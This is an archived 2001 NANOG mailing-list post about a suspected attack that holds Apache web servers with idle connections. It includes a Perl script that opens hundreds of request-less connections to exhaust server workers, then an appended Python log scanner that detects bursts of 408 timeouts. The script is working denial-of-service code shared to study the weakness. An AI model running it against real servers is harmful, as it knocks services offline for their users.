[42678] in North American Network Operators' Group


Re: Pattern matching odd HTTP request

daemon@ATHENA.MIT.EDU (Bill McGonigle)
Tue Sep 18 19:02:28 2001

Date: Tue, 18 Sep 2001 18:58:42 -0400
Mime-Version: 1.0 (Apple Message framework v468)
Cc: "Karsten W. Rohrbach" <karsten@rohrbach.de>, mike@biggorilla.com,
	nanog@merit.edu
Message-Id: <B49B3647-AC88-11D5-9707-003065EAE3C0@medicalmedia.com>
In-Reply-To: <200109182231.f8IMV1aa014239@Espresso.NEEBU.Net>
Content-Type: text/plain; charset=US-ASCII; format=flowed
From: Bill McGonigle <mcgonigle@medicalmedia.com>
Content-Transfer-Encoding: 7bit
To: khuon@GBLX.Net (Jake Khuon)
Errors-To: owner-nanog-outgoing@merit.edu
On Tuesday, September 18, 2001, at 06:30 PM, Jake Khuon wrote:
>
> You start to suspect a DDOS port-flood attack.  It's certainly causing
> me to spawn a lot of httpds and occupying a lot of ports.
>

This isn't good.  I wrote a bit of test code to see what would happen if
I had a lot of timeouts:

#-----
use strict;
use warnings;
use Net::Telnet;

my $num_open = 400;   # how many idle connections to open

sub doConnect {
     # Connect to port 80 but never send a request line.  Each recursive
     # frame keeps its own handle in scope, so every connection stays open
     # until the innermost call finishes sleeping.
     my $telnet_handle = Net::Telnet->new(Port => 80);
     $telnet_handle->open("localhost");
     if ($num_open > 0) {
         print "$num_open...";
         $num_open--;
         doConnect();
     } else {
         sleep(20);   # hold all the open connections idle for 20 seconds
     }
}

doConnect();
print "\n";
#-----

On Apache 1.3, this brings the number of httpd processes up to 
MaxClients, then each one waits 300 seconds (the default timeout) for 
the connections to time out, at which point the other connections are 
made, and the cycle continues.  A DDOS of this nature would be 
particularly nasty.  One client (happened to be on localhost) tied up 
the server for 6 minutes this way with the default Apache config.

Here's what the logfile for these attempts looks like:

127.0.0.1 - - [18/Sep/2001:18:43:06 -0400] "-" 408 -

Doh!

-----
Bill McGonigle
Research & Development
Medical Media Systems, Inc.
http://www.medicalmedia.com
+1.603.298.5509x329
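A defender-side complement to the message above, added here and not part of the original post: a small Python scan over Apache common-log lines that flags a client producing a burst of 408 entries like the one Bill quoted. The sample log lines, the threshold and the window length are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common log format. The request field is "-" when the client
# never sent a request line, which is the 408 case quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

def parse_line(line):
    """Return (ip, datetime, status) or None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, int(m.group("status"))

def find_timeout_floods(lines, threshold=3, window_seconds=600):
    """Return {ip: peak_count} for clients with >= threshold 408 entries
    inside any window_seconds span. Lines are assumed to be in log order."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent 408s
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, status = parsed
        if status != 408:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()             # drop 408s older than the window
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

# Constructed sample log lines modelled on the entry quoted in the post.
SAMPLE_LOG = [
    '127.0.0.1 - - [18/Sep/2001:18:43:06 -0400] "-" 408 -',
    '127.0.0.1 - - [18/Sep/2001:18:43:06 -0400] "-" 408 -',
    '10.0.0.5 - - [18/Sep/2001:18:43:07 -0400] "GET / HTTP/1.0" 200 1234',
    '127.0.0.1 - - [18/Sep/2001:18:43:07 -0400] "-" 408 -',
    '10.0.0.5 - - [18/Sep/2001:18:58:10 -0400] "-" 408 -',
    '127.0.0.1 - - [18/Sep/2001:18:48:06 -0400] "-" 408 -',
]

if __name__ == "__main__":
    print(find_timeout_floods(SAMPLE_LOG))   # {'127.0.0.1': 4}
```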

